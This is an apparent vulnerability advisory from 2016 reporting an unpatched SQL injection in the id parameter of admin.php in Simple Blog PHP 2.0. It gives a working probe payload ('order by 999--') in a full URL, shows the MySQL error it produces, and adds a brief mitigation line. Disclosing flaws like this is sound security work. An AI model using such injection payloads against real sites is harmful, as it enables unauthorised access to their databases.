vendor:
Simple Blog PHP
by:
Ashiyane Digital Security Team
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Simple Blog PHP
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: 2.0
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: WebApp - PHP
2016
Simple Blog PHP 2.0 – SQL Injection
This vulnerability is in admin.php file when we want to edit a post or edit a categorie and..., with id parameter can show sql injection. A simple inject: Payload: '+order+by+999--+ http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+ In response can see result: Could not execute MySQL query: SELECT * FROM blog_posts WHERE id='' order by 999-- ' . Error: Unknown column '999' in 'order clause' Result of payload: Error: Unknown column '999' in 'order clause'
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.